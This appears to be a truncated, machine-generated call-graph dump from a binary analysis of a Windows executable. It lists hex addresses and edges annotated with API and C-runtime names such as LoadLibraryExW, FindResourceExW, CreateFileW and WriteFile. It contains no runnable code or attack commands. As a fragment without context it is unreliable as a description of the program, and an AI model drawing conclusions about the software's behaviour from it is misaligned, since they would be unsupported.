GetMessageW 100089->100091 100091->100091 100092 9160b2 100091->100092 100092->100077 100093 91517a TranslateAcceleratorW 100096 8e0fa3 PeekMessageW 100093->100096 100093->100144 100094 8d9fbd 60 API calls 100094->100144 100095 8e0fbf TranslateMessage DispatchMessageW 100095->100096 100096->100144 100097 915c49 WaitForSingleObject 100101 915c66 GetExitCodeProcess CloseHandle 100097->100101 100097->100144 100099 8f0ff6 59 API calls Mailbox 100099->100144 100100 8e0e73 timeGetTime 100100->100144 100134 8e10f5 100101->100134 100102 8e0fdd Sleep 100133 8e0fee Mailbox 100102->100133 100103 8d81a7 59 API calls 100103->100144 100104 8d77c7 59 API calls 100104->100133 100105 915f22 Sleep 100105->100133 100108 8f0719 timeGetTime 100108->100133 100109 8e10ae timeGetTime 101234 8d9fbd 60 API calls 100109->101234 100112 915fb9 GetExitCodeProcess 100115 915fe5 CloseHandle 100112->100115 100116 915fcf WaitForSingleObject 100112->100116 100113 8d9997 84 API calls 100113->100144 100114 8db93d 109 API calls 100114->100133 100115->100133 100116->100115 100116->100144 100119 9561ac 110 API calls 100119->100133 100120 915c9e 100120->100134 100121 9154a2 Sleep 100121->100144 100122 916041 Sleep 100122->100144 100124 8d7f41 59 API calls 100124->100133 100133->100104 100133->100108 100133->100112 100133->100114 100133->100119 100133->100120 100133->100121 100133->100122 100133->100124 100133->100134 100133->100144 101244 9328f7 60 API calls 100133->101244 101245 8d9fbd 60 API calls 100133->101245 101246 8d8b13 69 API calls Mailbox 100133->101246 101247 8db89c 331 API calls 100133->101247 101248 926a50 60 API calls 100133->101248 101249 9354e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100133->101249 101250 933e91 66 API calls Mailbox 100133->101250 100134->99925 100135 93a0b5 89 API calls 100135->100144 100137 8d8620 69 API calls 100137->100144 100138 8d9df0 59 API calls Mailbox 100138->100144 100139 8da000 304 API calls 100139->100144 100140 8db89c 304 API calls 100140->100144 100142 9266f4 59 API calls Mailbox 100142->100144 100143 8d8b13 69 API calls 100143->100144 100144->100081 100144->100086 100144->100088 100144->100093 100144->100094 100144->100095 100144->100096 100144->100097 100144->100099 100144->100100 100144->100102 100144->100103 100144->100105 100144->100109 100144->100113 100144->100133 100144->100134 100144->100135 100144->100137 100144->100138 100144->100139 100144->100140 100144->100142 100144->100143 100145 9159ff VariantClear 100144->100145 100146 927405 59 API calls 100144->100146 100147 915a95 VariantClear 100144->100147 100148 8d8e34 59 API calls Mailbox 100144->100148 100149 915843 VariantClear 100144->100149 100150 8d7f41 59 API calls 100144->100150 101179 8de800 100144->101179 101210 8df5c0 100144->101210 101229 8de580 331 API calls 100144->101229 101230 8dfe40 331 API calls 2 library calls 100144->101230 101231 8d31ce IsDialogMessageW GetClassLongW 100144->101231 101238 95629f 59 API calls 100144->101238 101239 939c9f 59 API calls Mailbox 100144->101239 101240 92d9e3 59 API calls 100144->101240 101241 926665 59 API calls 2 library calls 100144->101241 101242 8d8561 59 API calls 100144->101242 101243 8d843f 59 API calls Mailbox 100144->101243 100145->100144 100146->100144 100147->100144 100148->100144 100149->100144 100150->100144 100151->99895 100152->99902 100153->99915 100155 8d3d50 __ftell_nolock 100154->100155 100156 8d7d2c 59 API calls 100155->100156 100167 8d3eb6 Mailbox 100155->100167 100158 8d3d82 100156->100158 100164 8d3db8 Mailbox 100158->100164 100265 8d7b52 100158->100265 100159 8d7b52 59 API calls 100159->100164 100160 8d3e89 100161 8d7f41 59 API calls 100160->100161 100160->100167 100163 8d3eaa 100161->100163 100162 8d7f41 59 API calls 100162->100164 100165 8d3f84 59 API calls 100163->100165 100164->100159 100164->100160 100164->100162 100166 8d3f84 59 API calls 100164->100166 100164->100167 100165->100167 100166->100164 100167->99946 100268 8d4d13 100168->100268 100173 8d4f68 LoadLibraryExW 100278 8d4cc8 100173->100278 100174 90dd0f 100176 8d4faa 84 API calls 100174->100176 100177 90dd16 100176->100177 100179 8d4cc8 3 API calls 100177->100179 100181 90dd1e 100179->100181 100304 8d506b 100181->100304 100182 8d4f8f 100182->100181 100183 8d4f9b 100182->100183 100185 8d4faa 84 API calls 100183->100185 100187 8d37e6 100185->100187 100187->99953 100187->99954 100189 90dd45 100312 8d5027 100189->100312 100191 90dd52 100193 8f0ff6 Mailbox 59 API calls 100192->100193 100194 8d380d 100193->100194 100194->99967 100196 8d862b 100195->100196 100198 8d8652 100196->100198 100563 8d8b13 69 API calls Mailbox 100196->100563 100198->99971 100200 8d3eec 100199->100200 100201 8d3f05 100199->100201 100203 8d81a7 59 API calls 100200->100203 100202 8d7d2c 59 API calls 100201->100202 100204 8d388b 100202->100204 100203->100204 100205 8f313d 100204->100205 100206 8f31be 100205->100206 100207 8f3149 100205->100207 100566 8f31d0 60 API calls 3 library calls 100206->100566 100211 8f316e 100207->100211 100564 8f8d68 58 API calls __getptd_noexit 100207->100564 100210 8f31cb 100210->99992 100211->99992 100212 8f3155 100565 8f8ff6 9 API calls __cftoe2_l 100212->100565 100214 8f3160 100214->99992 100216 90f5a5 100215->100216 100222 8d9057 100215->100222 100216->100222 100568 8d8d3b 59 API calls Mailbox 100216->100568 100218 8d9158 100220 8f0ff6 Mailbox 59 API calls 100218->100220 100219 8d91a0 100567 8d9e9c 60 API calls Mailbox 100219->100567 100223 8d915f 100220->100223 100222->100218 100222->100219 100222->100223 100223->100020 100225 8d5045 85 API calls 100224->100225 100226 939854 100225->100226 100569 9399be 100226->100569 100229 8d506b 74 API calls 100230 939881 100229->100230 100231 8d506b 74 API calls 100230->100231 100232 939891 100231->100232 100233 8d506b 74 API calls 100232->100233 100234 9398ac 100233->100234 100235 8d506b 74 API calls 100234->100235 100236 9398c7 100235->100236 100237 8d5045 85 API calls 100236->100237 100238 9398de 100237->100238 100239 8f594c __crtCompareStringA_stat 58 API calls 100238->100239 100240 9398e5 100239->100240 100241 8f594c __crtCompareStringA_stat 58 API calls 100240->100241 100242 9398ef 100241->100242 100243 8d506b 74 API calls 100242->100243 100244 939903 100243->100244 100245 939393 GetSystemTimeAsFileTime 100244->100245 100246 939916 100245->100246 100247 939940 100246->100247 100248 93992b 100246->100248 100249 939946 100247->100249 100250 9399a5 100247->100250 100251 8f2f95 _free 58 API calls 100248->100251 100575 938d90 100249->100575 100253 8f2f95 _free 58 API calls 100250->100253 100254 939931 100251->100254 100256 90d3c1 100253->100256 100257 8f2f95 _free 58 API calls 100254->100257 100256->99957 100259 8d4faa 100256->100259 100257->100256 100258 8f2f95 _free 58 API calls 100258->100256 100260 8d4fb4 100259->100260 100262 8d4fbb 100259->100262 100261 8f55d6 __fcloseall 83 API calls 100260->100261 100261->100262 100263 8d4fdb FreeLibrary 100262->100263 100264 8d4fca 100262->100264 100263->100264 100264->99957 100266 8d7faf 59 API calls 100265->100266 100267 8d7b5d 100266->100267 100267->100158 100317 8d4d61 100268->100317 100271 8d4d4a FreeLibrary 100272 8d4d53 100271->100272 100275 8f548b 100272->100275 100273 8d4d61 2 API calls 100274 8d4d3a 100273->100274 100274->100271 100274->100272 100321 8f54a0 100275->100321 100277 8d4f5c 100277->100173 100277->100174 100481 8d4d94 100278->100481 100281 8d4cff FreeLibrary 100282 8d4d08 100281->100282 100285 8d4dd0 100282->100285 100283 8d4d94 2 API calls 100284 8d4ced 100283->100284 100284->100281 100284->100282 100286 8f0ff6 Mailbox 59 API calls 100285->100286 100287 8d4de5 100286->100287 100288 8d538e 59 API calls 100287->100288 100289 8d4df1 _memmove 100288->100289 100290 8d4e2c 100289->100290 100292 8d4ee9 100289->100292 100293 8d4f21 100289->100293 100291 8d5027 69 API calls 100290->100291 100300 8d4e35 100291->100300 100485 8d4fe9 CreateStreamOnHGlobal 100292->100485 100496 939ba5 95 API calls 100293->100496 100296 8d506b 74 API calls 100296->100300 100298 8d4ec9 100298->100182 100299 90dcd0 100301 8d5045 85 API calls 100299->100301 100300->100296 100300->100298 100300->100299 100491 8d5045 100300->100491 100302 90dce4 100301->100302 100303 8d506b 74 API calls 100302->100303 100303->100298 100305 8d507d 100304->100305 100306 90ddf6 100304->100306 100520 8f5812 100305->100520 100309 939393 100540 9391e9 100309->100540 100311 9393a9 100311->100189 100313 90ddb9 100312->100313 100314 8d5036 100312->100314 100545 8f5e90 100314->100545 100316 8d503e 100316->100191 100318 8d4d2e 100317->100318 100319 8d4d6a LoadLibraryA 100317->100319 100318->100273 100318->100274 100319->100318 100320 8d4d7b GetProcAddress 100319->100320 100320->100318 100324 8f54ac type_info::_Type_info_dtor 100321->100324 100322 8f54bf 100370 8f8d68 58 API calls __getptd_noexit 100322->100370 100324->100322 100326 8f54f0 100324->100326 100325 8f54c4 100371 8f8ff6 9 API calls __cftoe2_l 100325->100371 100340 900738 100326->100340 100329 8f54f5 100330 8f54fe 100329->100330 100331 8f550b 100329->100331 100372 8f8d68 58 API calls __getptd_noexit 100330->100372 100333 8f5535 100331->100333 100334 8f5515 100331->100334 100355 900857 100333->100355 100373 8f8d68 58 API calls __getptd_noexit 100334->100373 100337 8f54cf type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 100337->100277 100341 900744 type_info::_Type_info_dtor 100340->100341 100342 8f9e4b __lock 58 API calls 100341->100342 100352 900752 100342->100352 100343 9007c6 100375 90084e 100343->100375 100344 9007cd 100380 8f8a5d 58 API calls 2 library calls 100344->100380 100347 900843 type_info::_Type_info_dtor 100347->100329 100348 9007d4 100348->100343 100381 8fa06b InitializeCriticalSectionAndSpinCount 100348->100381 100351 8f9ed3 __mtinitlocknum 58 API calls 100351->100352 100352->100343 100352->100344 100352->100351 100378 8f6e8d 59 API calls __lock 100352->100378 100379 8f6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 100352->100379 100353 9007fa EnterCriticalSection 100353->100343 100364 900877 __wopenfile 100355->100364 100356 900891 100386 8f8d68 58 API calls __getptd_noexit 100356->100386 100357 900a4c 100357->100356 100361 900aaf 100357->100361 100359 900896 100387 8f8ff6 9 API calls __cftoe2_l 100359->100387 100383 9087f1 100361->100383 100362 8f5540 100374 8f5562 LeaveCriticalSection LeaveCriticalSection _fseek 100362->100374 100364->100356 100364->100357 100388 8f3a0b 60 API calls 2 library calls 100364->100388 100366 900a45 100366->100357 100389 8f3a0b 60 API calls 2 library calls 100366->100389 100368 900a64 100368->100357 100390 8f3a0b 60 API calls 2 library calls 100368->100390 100370->100325 100371->100337 100372->100337 100373->100337 100374->100337 100382 8f9fb5 LeaveCriticalSection 100375->100382 100377 900855 100377->100347 100378->100352 100379->100352 100380->100348 100381->100353 100382->100377 100391 907fd5 100383->100391 100385 90880a 100385->100362 100386->100359 100387->100362 100388->100366 100389->100368 100390->100357 100394 907fe1 type_info::_Type_info_dtor 100391->100394 100392 907ff7 100478 8f8d68 58 API calls __getptd_noexit 100392->100478 100394->100392 100396 90802d 100394->100396 100395 907ffc 100479 8f8ff6 9 API calls __cftoe2_l 100395->100479 100402 90809e 100396->100402 100399 908049 100480 908072 LeaveCriticalSection __unlock_fhandle 100399->100480 100400 908006 type_info::_Type_info_dtor 100400->100385 100403 9080be 100402->100403 100404 8f471a __wsopen_nolock 58 API calls 100403->100404 100408 9080da 100404->100408 100405 908211 100406 8f9006 __invoke_watson 8 API calls 100405->100406 100407 9087f0 100406->100407 100410 907fd5 __wsopen_helper 103 API calls 100407->100410 100408->100405 100409 908114 100408->100409 100416 908137 100408->100416 100411 8f8d34 __read 58 API calls 100409->100411 100412 90880a 100410->100412 100413 908119 100411->100413 100412->100399 100414 8f8d68 __cftoe2_l 58 API calls 100413->100414 100415 908126 100414->100415 100418 8f8ff6 __cftoe2_l 9 API calls 100415->100418 100417 9081f5 100416->100417 100425 9081d3 100416->100425 100419 8f8d34 __read 58 API calls 100417->100419 100420 908130 100418->100420 100421 9081fa 100419->100421 100420->100399 100422 8f8d68 __cftoe2_l 58 API calls 100421->100422 100423 908207 100422->100423 100424 8f8ff6 __cftoe2_l 9 API calls 100423->100424 100424->100405 100426 8fd4d4 __alloc_osfhnd 61 API calls 100425->100426 100427 9082a1 100426->100427 100428 9082ab 100427->100428 100429 9082ce 100427->100429 100431 8f8d34 __read 58 API calls 100428->100431 100430 907f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100429->100430 100440 9082f0 100430->100440 100432 9082b0 100431->100432 100434 8f8d68 __cftoe2_l 58 API calls 100432->100434 100433 90836e GetFileType 100437 908379 GetLastError 100433->100437 100438 9083bb 100433->100438 100436 9082ba 100434->100436 100435 90833c GetLastError 100441 8f8d47 __dosmaperr 58 API calls 100435->100441 100442 8f8d68 __cftoe2_l 58 API calls 100436->100442 100439 8f8d47 __dosmaperr 58 API calls 100437->100439 100448 8fd76a __set_osfhnd 59 API calls 100438->100448 100443 9083a0 CloseHandle 100439->100443 100440->100433 100440->100435 100444 907f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100440->100444 100445 908361 100441->100445 100442->100420 100443->100445 100446 9083ae 100443->100446 100447 908331 100444->100447 100450 8f8d68 __cftoe2_l 58 API calls 100445->100450 100449 8f8d68 __cftoe2_l 58 API calls 100446->100449 100447->100433 100447->100435 100453 9083d9 100448->100453 100451 9083b3 100449->100451 100450->100405 100451->100445 100452 908594 100452->100405 100456 908767 CloseHandle 100452->100456 100453->100452 100454 901b11 __lseeki64_nolock 60 API calls 100453->100454 100467 90845a 100453->100467 100455 908443 100454->100455 100459 8f8d34 __read 58 API calls 100455->100459 100463 908462 100455->100463 100457 907f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100456->100457 100458 90878e 100457->100458 100461 908796 GetLastError 100458->100461 100469 90861e 100458->100469 100459->100467 100460 9010ab 70 API calls __read_nolock 100460->100463 100462 8f8d47 __dosmaperr 58 API calls 100461->100462 100464 9087a2 100462->100464 100463->100460 100465 900d2d __close_nolock 61 API calls 100463->100465 100463->100467 100468 9099f2 __chsize_nolock 82 API calls 100463->100468 100471 908611 100463->100471 100474 901b11 60 API calls __lseeki64_nolock 100463->100474 100477 9085fa 100463->100477 100466 8fd67d __free_osfhnd 59 API calls 100464->100466 100465->100463 100466->100469 100467->100452 100467->100463 100470 8fdac6 __write 78 API calls 100467->100470 100472 901b11 60 API calls __lseeki64_nolock 100467->100472 100468->100463 100469->100405 100470->100467 100473 900d2d __close_nolock 61 API calls 100471->100473 100472->100467 100475 908618 100473->100475 100474->100463 100476 8f8d68 __cftoe2_l 58 API calls 100475->100476 100476->100469 100477->100452 100478->100395 100479->100400 100480->100400 100482 8d4ce1 100481->100482 100483 8d4d9d LoadLibraryA 100481->100483 100482->100283 100482->100284 100483->100482 100484 8d4dae GetProcAddress 100483->100484 100484->100482 100486 8d5020 100485->100486 100487 8d5003 FindResourceExW 100485->100487 100486->100290 100487->100486 100488 90dd5c LoadResource 100487->100488 100488->100486 100489 90dd71 SizeofResource 100488->100489 100489->100486 100490 90dd85 LockResource 100489->100490 100490->100486 100492 90ddd4 100491->100492 100493 8d5054 100491->100493 100497 8f5a7d 100493->100497 100495 8d5062 100495->100300 100496->100290 100498 8f5a89 type_info::_Type_info_dtor 100497->100498 100499 8f5a9b 100498->100499 100501 8f5ac1 100498->100501 100510 8f8d68 58 API calls __getptd_noexit 100499->100510 100512 8f6e4e 100501->100512 100502 8f5aa0 100511 8f8ff6 9 API calls __cftoe2_l 100502->100511 100505 8f5ac7 100518 8f59ee 83 API calls 5 library calls 100505->100518 100507 8f5ad6 100519 8f5af8 LeaveCriticalSection LeaveCriticalSection _fseek 100507->100519 100509 8f5aab type_info::_Type_info_dtor 100509->100495 100510->100502 100511->100509 100513 8f6e5e 100512->100513 100514 8f6e80 EnterCriticalSection 100512->100514 100513->100514 100515 8f6e66 100513->100515 100516 8f6e76 100514->100516 100517 8f9e4b __lock 58 API calls 100515->100517 100516->100505 100517->100516 100518->100507 100519->100509 100523 8f582d 100520->100523 100522 8d508e 100522->100309 100524 8f5839 type_info::_Type_info_dtor 100523->100524 100525 8f587c 100524->100525 100526 8f5874 type_info::_Type_info_dtor 100524->100526 100532 8f584f _memset 100524->100532 100527 8f6e4e __lock_file 59 API calls 100525->100527 100526->100522 100529 8f5882 100527->100529 100538 8f564d 72 API calls 6 library calls 100529->100538 100530 8f5869 100537 8f8ff6 9 API calls __cftoe2_l 100530->100537 100536 8f8d68 58 API calls __getptd_noexit 100532->100536 100534 8f5898 100539 8f58b6 LeaveCriticalSection LeaveCriticalSection _fseek 100534->100539 100536->100530 100537->100526 100538->100534 100539->100526 100543 8f543a GetSystemTimeAsFileTime 100540->100543 100542 9391f8 100542->100311 100544 8f5468 __aulldiv 100543->100544 100544->100542 100546 8f5e9c type_info::_Type_info_dtor 100545->100546 100547 8f5eae 100546->100547 100548 8f5ec3 100546->100548 100559 8f8d68 58 API calls __getptd_noexit 100547->100559 100550 8f6e4e __lock_file 59 API calls 100548->100550 100552 8f5ec9 100550->100552 100551 8f5eb3 100560 8f8ff6 9 API calls __cftoe2_l 100551->100560 100561 8f5b00 67 API calls 6 library calls 100552->100561 100555 8f5ed4 100562 8f5ef4 LeaveCriticalSection LeaveCriticalSection _fseek 100555->100562 100556 8f5ebe type_info::_Type_info_dtor 100556->100316 100558 8f5ee6 100558->100556 100559->100551 100560->100556 100561->100555 100562->100558 100563->100198 100564->100212 100565->100214 100566->100210 100567->100223 100568->100222 100574 9399d2 __tzset_nolock _wcscmp 100569->100574 100570 8d506b 74 API calls 100570->100574 100571 939866 100571->100229 100571->100256 100572 939393 GetSystemTimeAsFileTime 100572->100574 100573 8d5045 85 API calls 100573->100574 100574->100570 100574->100571 100574->100572 100574->100573 100576 938d9b 100575->100576 100577 938da9 100575->100577 100578 8f548b 115 API calls 100576->100578 100579 938dee 100577->100579 100580 8f548b 115 API calls 100577->100580 100605 938db2 100577->100605 100578->100577 100606 93901b 74 API calls 3 library calls 100579->100606 100582 938dd3 100580->100582 100582->100579 100584 938ddc 100582->100584 100583 938e32 100585 938e57 100583->100585 100586 938e36 100583->100586 100584->100605 100617 8f55d6 100584->100617 100607 938c33 58 API calls __crtCompareStringA_stat 100585->100607 100590 8f55d6 __fcloseall 83 API calls 100586->100590 100591 938e43 100586->100591 100589 938e5f 100592 938e85 100589->100592 100593 938e65 100589->100593 100590->100591 100594 8f55d6 __fcloseall 83 API calls 100591->100594 100591->100605 100608 938eb5 90 API calls 100592->100608 100595 938e72 100593->100595 100597 8f55d6 __fcloseall 83 API calls 100593->100597 100594->100605 100600 8f55d6 __fcloseall 83 API calls 100595->100600 100595->100605 100597->100595 100598 938e8c 100609 938f97 100598->100609 100600->100605 100602 938ea0 100604 8f55d6 __fcloseall 83 API calls 100602->100604 100602->100605 100603 8f55d6 __fcloseall 83 API calls 100603->100602 100604->100605 100605->100258 100606->100583 100607->100589 100608->100598 100610 938fa4 100609->100610 100611 938faa 100609->100611 100612 8f2f95 _free 58 API calls 100610->100612 100613 938fbb 100611->100613 100614 8f2f95 _free 58 API calls 100611->100614 100612->100611 100615 8f2f95 _free 58 API calls 100613->100615 100616 938e93 100613->100616 100614->100613 100615->100616 100616->100602 100616->100603 100618 8f55e2 type_info::_Type_info_dtor 100617->100618 100619 8f560e 100618->100619 100620 8f55f6 100618->100620 100622 8f6e4e __lock_file 59 API calls 100619->100622 100629 8f5606 type_info::_Type_info_dtor 100619->100629 100646 8f8d68 58 API calls __getptd_noexit 100620->100646 100624 8f5620 100622->100624 100623 8f55fb 100647 8f8ff6 9 API calls __cftoe2_l 100623->100647 100630 8f556a 100624->100630 100629->100605 100631 8f558d 100630->100631 100632 8f5579 100630->100632 100633 8f5589 100631->100633 100649 8f4c6d 100631->100649 100692 8f8d68 58 API calls __getptd_noexit 100632->100692 100648 8f5645 LeaveCriticalSection LeaveCriticalSection _fseek 100633->100648 100635 8f557e 100693 8f8ff6 9 API calls __cftoe2_l 100635->100693 100642 8f55a7 100666 900c52 100642->100666 100644 8f55ad 100644->100633 100645 8f2f95 _free 58 API calls 100644->100645 100645->100633 100646->100623 100647->100629 100648->100629 100650 8f4c80 100649->100650 100651 8f4ca4 100649->100651 100650->100651 100652 8f4916 __stbuf 58 API calls 100650->100652 100655 900dc7 100651->100655 100653 8f4c9d 100652->100653 100694 8fdac6 100653->100694 100656 8f55a1 100655->100656 100657 900dd4 100655->100657 100659 8f4916 100656->100659 100657->100656 100658 8f2f95 _free 58 API calls 100657->100658 100658->100656 100660 8f4935 100659->100660 100661 8f4920 100659->100661 100660->100642 100804 8f8d68 58 API calls __getptd_noexit 100661->100804 100663 8f4925 100805 8f8ff6 9 API calls __cftoe2_l 100663->100805 100665 8f4930 100665->100642 100667 900c5e type_info::_Type_info_dtor 100666->100667 100668 900c82 100667->100668 100669 900c6b 100667->100669 100670 900d0d 100668->100670 100672 900c92 100668->100672 100821 8f8d34 58 API calls __getptd_noexit 100669->100821 100826 8f8d34 58 API calls __getptd_noexit 100670->100826 100675 900cb0 100672->100675 100676 900cba 100672->100676 100674 900c70 100822 8f8d68 58 API calls __getptd_noexit 100674->100822 100823 8f8d34 58 API calls __getptd_noexit 100675->100823 100680 8fd446 ___lock_fhandle 59 API calls 100676->100680 100677 900cb5 100827 8f8d68 58 API calls __getptd_noexit 100677->100827 100682 900cc0 100680->100682 100684 900cd3 100682->100684 100685 900cde 100682->100685 100683 900d19 100828 8f8ff6 9 API calls __cftoe2_l 100683->100828 100806 900d2d 100684->100806 100824 8f8d68 58 API calls __getptd_noexit 100685->100824 100688 900c77 type_info::_Type_info_dtor 100688->100644 100690 900cd9 100825 900d05 LeaveCriticalSection __unlock_fhandle 100690->100825 100692->100635 100693->100633 100695 8fdad2 type_info::_Type_info_dtor 100694->100695 100696 8fdadf 100695->100696 100697 8fdaf6 100695->100697 100795 8f8d34 58 API calls __getptd_noexit 100696->100795 100699 8fdb95 100697->100699 100702 8fdb0a 100697->100702 100801 8f8d34 58 API calls __getptd_noexit 100699->100801 100701 8fdae4 100796 8f8d68 58 API calls __getptd_noexit 100701->100796 100705 8fdb28 100702->100705 100706 8fdb32 100702->100706 100703 8fdb2d 100802 8f8d68 58 API calls __getptd_noexit 100703->100802 100797 8f8d34 58 API calls __getptd_noexit 100705->100797 100722 8fd446 100706->100722 100708 8fdaeb type_info::_Type_info_dtor 100708->100651 100711 8fdb38 100713 8fdb5e 100711->100713 100714 8fdb4b 100711->100714 100712 8fdba1 100803 8f8ff6 9 API calls __cftoe2_l 100712->100803 100798 8f8d68 58 API calls __getptd_noexit 100713->100798 100731 8fdbb5 100714->100731 100718 8fdb63 100799 8f8d34 58 API calls __getptd_noexit 100718->100799 100719 8fdb57 100800 8fdb8d LeaveCriticalSection __unlock_fhandle 100719->100800 100724 8fd452 type_info::_Type_info_dtor 100722->100724 100723 8fd4a1 EnterCriticalSection 100725 8fd4c7 type_info::_Type_info_dtor 100723->100725 100724->100723 100726 8f9e4b __lock 58 API calls 100724->100726 100725->100711 100727 8fd477 100726->100727 100728 8fd48f 100727->100728 100730 8fa06b __ioinit InitializeCriticalSectionAndSpinCount 100727->100730 100729 8fd4cb ___lock_fhandle LeaveCriticalSection 100728->100729 100729->100723 100730->100728 100732 8fdbc2 __ftell_nolock 100731->100732 100733 8fdc01 100732->100733 100734 8fdc20 100732->100734 100759 8fdbf6 100732->100759 100736 8f8d34 __read 58 API calls 100733->100736 100737 8fdc78 100734->100737 100738 8fdc5c 100734->100738 100735 8fc836 __except1 6 API calls 100739 8fe416 100735->100739 100740 8fdc06 100736->100740 100742 8fdc91 100737->100742 100746 901b11 __lseeki64_nolock 60 API calls 100737->100746 100741 8f8d34 __read 58 API calls 100738->100741 100739->100719 100743 8f8d68 __cftoe2_l 58 API calls 100740->100743 100745 8fdc61 100741->100745 100744 905ebb __stbuf 58 API calls 100742->100744 100747 8fdc0d 100743->100747 100748 8fdc9f 100744->100748 100749 8f8d68 __cftoe2_l 58 API calls 100745->100749 100746->100742 100750 8f8ff6 __cftoe2_l 9 API calls 100747->100750 100751 8fdff8 100748->100751 100756 8f9bec _LocaleUpdate::_LocaleUpdate 58 API calls 100748->100756 100752 8fdc68 100749->100752 100750->100759 100753 8fe38b WriteFile 100751->100753 100754 8fe016 100751->100754 100755 8f8ff6 __cftoe2_l 9 API calls 100752->100755 100757 8fdfeb GetLastError 100753->100757 100764 8fdfb8 100753->100764 100758 8fe13a 100754->100758 100767 8fe02c 100754->100767 100755->100759 100760 8fdccb GetConsoleMode 100756->100760 100757->100764 100770 8fe22f 100758->100770 100772 8fe145 100758->100772 100759->100735 100760->100751 100762 8fdd0a 100760->100762 100761 8fe3c4 100761->100759 100763 8f8d68 __cftoe2_l 58 API calls 100761->100763 100762->100751 100765 8fdd1a GetConsoleCP 100762->100765 100768 8fe3f2 100763->100768 100764->100759 100764->100761 100769 8fe118 100764->100769 100765->100761 100792 8fdd49 100765->100792 100766 8fe09b WriteFile 100766->100757 100771 8fe0d8 100766->100771 100767->100761 100767->100766 100773 8f8d34 __read 58 API calls 100768->100773 100774 8fe3bb 100769->100774 100775 8fe123 100769->100775 100770->100761 100776 8fe2a4 WideCharToMultiByte 100770->100776 100771->100767 100777 8fe0fc 100771->100777 100772->100761 100778 8fe1aa WriteFile 100772->100778 100773->100759 100781 8f8d47 __dosmaperr 58 API calls 100774->100781 100780 8f8d68 __cftoe2_l 58 API calls 100775->100780 100776->100757 100787 8fe2eb 100776->100787 100777->100764 100778->100757 100779 8fe1f9 100778->100779 100779->100764 100779->100772 100779->100777 100782 8fe128 100780->100782 100781->100759 100785 8f8d34 __read 58 API calls 100782->100785 100783 8fe2f3 WriteFile 100784 8fe346 GetLastError 100783->100784 100783->100787 100784->100787 100785->100759 100786 8f3835 __write_nolock 58 API calls 100786->100792 100787->100764 100787->100770 100787->100777 100787->100783 100788 907cae WriteConsoleW CreateFileW __putwch_nolock 100793 8fde9f 100788->100793 100789 90650a 60 API calls __write_nolock 100789->100792 100790 8fde32 WideCharToMultiByte 100790->100764 100791 8fde6d WriteFile 100790->100791 100791->100757 100791->100793 100792->100764 100792->100786 100792->100789 100792->100790 100792->100793 100793->100757 100793->100764 100793->100788 100793->100792 100794 8fdec7 WriteFile 100793->100794 100794->100757 100794->100793 100795->100701 100796->100708 100797->100703 100798->100718 100799->100719 100800->100708 100801->100703 100802->100712 100803->100708 100804->100663 100805->100665 100829 8fd703 100806->100829 100808 900d91 100842 8fd67d 59 API calls 2 library calls 100808->100842 100810 900d3b 100810->100808 100811 900d6f 100810->100811 100813 8fd703 __commit 58 API calls 100810->100813 100811->100808 100814 8fd703 __commit 58 API calls 100811->100814 100812 900d99 100815 900dbb 100812->100815 100843 8f8d47 58 API calls 3 library calls 100812->100843 100816 900d66 100813->100816 100817 900d7b CloseHandle 100814->100817 100815->100690 100819 8fd703 __commit 58 API calls 100816->100819 100817->100808 100820 900d87 GetLastError 100817->100820 100819->100811 100820->100808 100821->100674 100822->100688 100823->100677 100824->100690 100825->100688 100826->100677 100827->100683 100828->100688 100830 8fd70e 100829->100830 100831 8fd723 100829->100831 100832 8f8d34 __read 58 API calls 100830->100832 100834 8f8d34 __read 58 API calls 100831->100834 100837 8fd748 100831->100837 100833 8fd713 100832->100833 100836 8f8d68 __cftoe2_l 58 API calls 100833->100836 100835 8fd752 100834->100835 100838 8f8d68 __cftoe2_l 58 API calls 100835->100838 100839 8fd71b 100836->100839 100837->100810 100840 8fd75a 100838->100840 100839->100810 100841 8f8ff6 __cftoe2_l 9 API calls 100840->100841 100841->100839 100842->100812 100843->100815 100845 901b90 __ftell_nolock 100844->100845 100846 8f09e2 GetLongPathNameW 100845->100846 100847 8d7d2c 59 API calls 100846->100847 100848 8d741d 100847->100848 100849 8d716b 100848->100849 100850 8d77c7 59 API calls 100849->100850 100851 8d717d 100850->100851 100852 8d48ae 60 API calls 100851->100852 100853 8d7188 100852->100853 100854 90ecae 100853->100854 100855 8d7193 100853->100855 100860 90ecc8 100854->100860 100902 8d7a68 61 API calls 100854->100902 100856 8d3f84 59 API calls 100855->100856 100858 8d719f 100856->100858 100896 8d34c2 100858->100896 100861 8d71b2 Mailbox 100861->100036 100863 8d4f3d 136 API calls 100862->100863 100864 8d69ef 100863->100864 100865 90e45a 100864->100865 100866 8d4f3d 136 API calls 100864->100866 100867 9397e5 122 API calls 100865->100867 100868 8d6a03 100866->100868 100869 90e46f 100867->100869 100868->100865 100870 8d6a0b 100868->100870 100871 90e490 100869->100871 100872 90e473 100869->100872 100874 8d6a17 100870->100874 100875 90e47b 100870->100875 100873 8f0ff6 Mailbox 59 API calls 100871->100873 100876 8d4faa 84 API calls 100872->100876 100881 90e4d5 Mailbox 100873->100881 100903 8d6bec 100874->100903 101010 934534 90 API calls _wprintf 100875->101010 100876->100875 100879 90e489 100879->100871 100882 90e689 100881->100882 100886 90e69a 100881->100886 100893 8d7f41 59 API calls 100881->100893 100996 8d766f 100881->100996 101004 8d74bd 100881->101004 101011 92fc4d 59 API calls 2 library calls 100881->101011 101012 92fb6e 61 API calls 2 library calls 100881->101012 101013 937621 59 API calls Mailbox 100881->101013 100883 8f2f95 _free 58 API calls 100882->100883 100884 90e691 100883->100884 100885 8d4faa 84 API calls 100884->100885 100885->100886 100890 8f2f95 _free 58 API calls 100886->100890 100892 8d4faa 84 API calls 100886->100892 101014 92fcb1 89 API calls 4 library calls 100886->101014 100890->100886 100892->100886 100893->100881 100897 8d34d4 100896->100897 100901 8d34f3 _memmove 100896->100901 100899 8f0ff6 Mailbox 59 API calls 100897->100899 100898 8f0ff6 Mailbox 59 API calls 100900 8d350a 100898->100900 100899->100901 100900->100861 100901->100898 100902->100854 100904 90e847 100903->100904 100905 8d6c15 100903->100905 101087 92fcb1 89 API calls 4 library calls 100904->101087 101020 8d5906 60 API calls Mailbox 100905->101020 100908 8d6c37 101021 8d5956 67 API calls 100908->101021 100909 